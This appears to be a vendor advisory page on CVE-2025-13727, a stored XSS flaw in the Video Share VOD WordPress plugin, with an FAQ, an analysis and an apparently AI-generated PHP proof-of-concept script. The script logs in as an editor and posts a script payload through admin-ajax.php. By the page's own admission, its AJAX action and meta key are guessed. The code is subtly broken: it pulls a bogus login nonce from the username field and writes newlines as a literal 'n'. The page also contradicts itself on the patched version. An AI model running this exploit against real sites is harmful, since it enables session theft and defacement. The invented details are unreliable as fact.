What is CVE-2025-13727?

CVE-2025-13727 is a stored cross-site scripting vulnerability in the Video Share VOD WordPress plugin, affecting versions up to and including 2.7.11. It allows authenticated users with editor-level permissions to inject arbitrary scripts into custom fields, which can execute in the browsers of users accessing those fields.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. Attackers can inject malicious scripts into custom fields that are then stored and rendered on pages, executing whenever users visit those pages.

Who is affected by this vulnerability?

The vulnerability affects WordPress installations using the Video Share VOD plugin version 2.7.11 or earlier, specifically in multisite setups or single sites where the unfiltered_html capability is disabled for editor roles and above.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Video Share VOD plugin installed on your WordPress site. If it is version 2.7.11 or earlier, and if your site meets the conditions mentioned, it is potentially vulnerable.

What steps should I take to fix this vulnerability?

To remediate this vulnerability, update the Video Share VOD plugin to version 2.7.12 or later, which includes necessary input validation and output escaping. Additionally, review your site’s custom fields for any injected scripts and sanitize them.

What does the CVSS score of 4.4 signify?

The CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability requires a high-privilege user to exploit it, the potential impact could still lead to significant issues such as session hijacking or site defacement.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into a web application, which are then stored on the server and executed in the browsers of users who access the affected pages. This can lead to unauthorized actions on behalf of users.

How does the proof of concept demonstrate the vulnerability?

The proof of concept simulates an authenticated user injecting a stored XSS payload into a vulnerable custom field. It highlights the steps an attacker would take to exploit the vulnerability, illustrating how the injected script could execute in the context of another user’s session.

What are the potential risks of exploitation?

Successful exploitation can lead to various risks, including session hijacking, unauthorized administrative access, and the ability to deface the site or inject backdoor plugins. The stored nature of the attack means that multiple users could be affected over time.

What are best practices for securing WordPress plugins?

Best practices for securing WordPress plugins include regular updates, implementing proper input validation and sanitization, using escaping functions for output, and conducting security audits on custom fields and user inputs to prevent vulnerabilities like XSS.

How can I monitor for vulnerabilities in my WordPress site?

To monitor for vulnerabilities, consider using security plugins that provide vulnerability scanning, subscribe to security advisories, and regularly check for updates to your plugins and themes. Staying informed about known vulnerabilities is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13727: Video Share VOD <= 2.7.11 – Authenticated (Editor+) Stored Cross-Site Scripting via Custom Field Meta Values (video-share-vod)

CVE ID CVE-2025-13727

Plugin video-share-vod

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 2.7.11

Patched Version —

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13727 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Video Share VOD WordPress plugin, affecting versions up to and including 2.7.11. The issue resides in the plugin’s settings or custom field meta value handling, allowing attackers with editor-level or higher permissions to inject arbitrary JavaScript. The vulnerability is only exploitable on WordPress multisite installations or on single sites where the `unfiltered_html` capability is disabled for the user role. The CVSS score of 4.4 reflects a moderate severity due to the high-privilege requirement and the conditional attack complexity.

Atomic Edge research infers the root cause is improper neutralization of user input before it is stored and subsequently rendered on a page (CWE-79). The vulnerability description explicitly cites insufficient input sanitization and output escaping on plugin settings. Without a code diff, it is inferred that the plugin likely fails to apply proper sanitization functions like `sanitize_text_field` or `wp_kses` on custom field meta values before saving them to the database. It also likely fails to use proper escaping functions like `esc_html` or `esc_attr` when outputting these values in the admin area or frontend. These conclusions are based on the CWE classification and standard WordPress security practices.

Exploitation requires an authenticated user with at least editor-level capabilities. The attacker would navigate to the plugin’s settings page or a post/page editor where the plugin’s custom fields are rendered. They would then inject a malicious script payload into a vulnerable custom field or setting parameter. A typical payload would be `alert(document.domain)` or a more stealthy JavaScript payload designed to steal session cookies. The script executes in the browser of any user who later visits the administrative page or frontend page where the tainted meta value is displayed without proper escaping.

Remediation requires implementing proper input validation, sanitization, and output escaping. The patched version (2.7.12) likely added sanitization calls (e.g., `sanitize_text_field`, `sanitize_meta`) when processing and saving custom field data from user input. It also likely added contextual output escaping (e.g., `esc_html`, `esc_attr`, `wp_kses`) when echoing these values in HTML contexts. For WordPress plugins, securing such fields often involves using the `sanitize_callback` argument when registering meta fields with `register_meta` or applying sanitization within the `update_post_meta` processing logic.

The impact of successful exploitation is the execution of arbitrary JavaScript in the context of a victim user’s browser session. For an editor or administrator victim, this could lead to session hijacking, creation of new administrative accounts, site defacement, or injection of backdoor plugins. The stored nature of the attack means a single injection can affect multiple users over time. The scope change (S:C) in the CVSS vector indicates the malicious script could impact users beyond the vulnerable plugin’s immediate component, potentially affecting the entire WordPress admin interface or site frontend.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13727 - Video Share VOD <= 2.7.11 - Authenticated (Editor+) Stored Cross-Site Scripting via Custom Field Meta Values
<?php
/*
 * Proof of Concept for CVE-2025-13727.
 * This script simulates an attack by an authenticated editor+ user injecting a stored XSS payload into a plugin custom field.
 * The exact endpoint and parameter names are inferred from the vulnerability description and common WordPress plugin patterns.
 * Assumptions:
 * 1. The target is a WordPress site with the Video Share VOD plugin (<=2.7.11) installed.
 * 2. The attacker has valid editor-level credentials (username/password).
 * 3. The site is a multisite installation or has `unfiltered_html` disabled for the editor role.
 * 4. The plugin has a custom field or setting named 'vs_vod_custom_field' (example) that is vulnerable.
 * 5. The plugin processes updates via the standard WordPress admin AJAX or POST handler.
 * This PoC performs a login to obtain authentication cookies, then attempts to submit a POST request to update a post meta field with a malicious script payload.
 */

$target_url = 'https://example.com'; // CHANGE THIS TO THE TARGET SITE URL
$username = 'editor_user'; // CHANGE THIS TO A VALID EDITOR USERNAME
$password = 'editor_password'; // CHANGE THIS TO THE USER'S PASSWORD

// The payload to inject. This is a simple alert for demonstration.
$payload = '<script>alert("Atomic Edge XSS Test - "+document.domain);</script>';

// Initialize cURL session for cookie handling
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

// Step 1: Get the login page to retrieve the nonce (wp_nonce) for logging in.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
$login_page = curl_exec($ch);

// Extract the login nonce (log) from the form. This regex is a common pattern.
preg_match('/name="log" value="([^"]*)"/', $login_page, $log_matches);
$log_nonce = $log_matches[1] ?? '';

// Step 2: Perform the WordPress login.
$login_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$login_response = curl_exec($ch);

// Check for successful login by looking for a redirect to /wp-admin/ or the presence of 'Dashboard'.
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('[-] Login failed. Check credentials.');
}
echo '[+] Login successful.n';

// Step 3: Assume the plugin uses the standard post meta update mechanism via admin-ajax.php.
// The exact AJAX action is unknown, but a common pattern is {plugin_slug}_update_meta.
// We target a specific post ID (e.g., 1) and inject the payload into a custom field.
$post_id = 1; // Assumed vulnerable post/page ID. An attacker would enumerate this.
$ajax_action = 'video_share_vod_update_meta'; // Inferred AJAX action name based on plugin slug.

$ajax_data = [
    'action' => $ajax_action,
    'post_id' => $post_id,
    'meta_key' => 'vs_vod_custom_field', // Inferred vulnerable meta key name.
    'meta_value' => $payload,
    '_ajax_nonce' => '' // Nonce may be required; this PoC assumes its absence or bypass is part of the vulnerability.
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, $ajax_data);
$ajax_response = curl_exec($ch);

// Check the response for success indicators.
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    echo '[+] AJAX request sent. Payload: ' . htmlspecialchars($payload) . 'n';
    echo '[+] If the meta field is vulnerable, the script will execute when the field is displayed.n';
} else {
    echo '[-] AJAX request may have failed. HTTP Code: ' . curl_getinfo($ch, CURLINFO_HTTP_CODE) . 'n';
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-13727?
Overview of the vulnerability
CVE-2025-13727 is a stored cross-site scripting vulnerability in the Video Share VOD WordPress plugin, affecting versions up to and including 2.7.11. It allows authenticated users with editor-level permissions to inject arbitrary scripts into custom fields, which can execute in the browsers of users accessing those fields.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. Attackers can inject malicious scripts into custom fields that are then stored and rendered on pages, executing whenever users visit those pages.
Who is affected by this vulnerability?
Affected user roles and installations
The vulnerability affects WordPress installations using the Video Share VOD plugin version 2.7.11 or earlier, specifically in multisite setups or single sites where the unfiltered_html capability is disabled for editor roles and above.
How can I check if my site is vulnerable?
Identifying vulnerable installations
To check for vulnerability, verify the version of the Video Share VOD plugin installed on your WordPress site. If it is version 2.7.11 or earlier, and if your site meets the conditions mentioned, it is potentially vulnerable.
What steps should I take to fix this vulnerability?
Remediation actions
To remediate this vulnerability, update the Video Share VOD plugin to version 2.7.12 or later, which includes necessary input validation and output escaping. Additionally, review your site’s custom fields for any injected scripts and sanitize them.
What does the CVSS score of 4.4 signify?
Understanding severity levels
The CVSS score of 4.4 indicates a medium severity level, suggesting that while the vulnerability requires a high-privilege user to exploit it, the potential impact could still lead to significant issues such as session hijacking or site defacement.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into a web application, which are then stored on the server and executed in the browsers of users who access the affected pages. This can lead to unauthorized actions on behalf of users.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of exploitation
The proof of concept simulates an authenticated user injecting a stored XSS payload into a vulnerable custom field. It highlights the steps an attacker would take to exploit the vulnerability, illustrating how the injected script could execute in the context of another user’s session.
What are the potential risks of exploitation?
Consequences of successful attacks
Successful exploitation can lead to various risks, including session hijacking, unauthorized administrative access, and the ability to deface the site or inject backdoor plugins. The stored nature of the attack means that multiple users could be affected over time.
What are best practices for securing WordPress plugins?
Preventative measures
Best practices for securing WordPress plugins include regular updates, implementing proper input validation and sanitization, using escaping functions for output, and conducting security audits on custom fields and user inputs to prevent vulnerabilities like XSS.
How can I monitor for vulnerabilities in my WordPress site?
Ongoing security practices
To monitor for vulnerabilities, consider using security plugins that provide vulnerability scanning, subscribe to security advisories, and regularly check for updates to your plugins and themes. Staying informed about known vulnerabilities is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations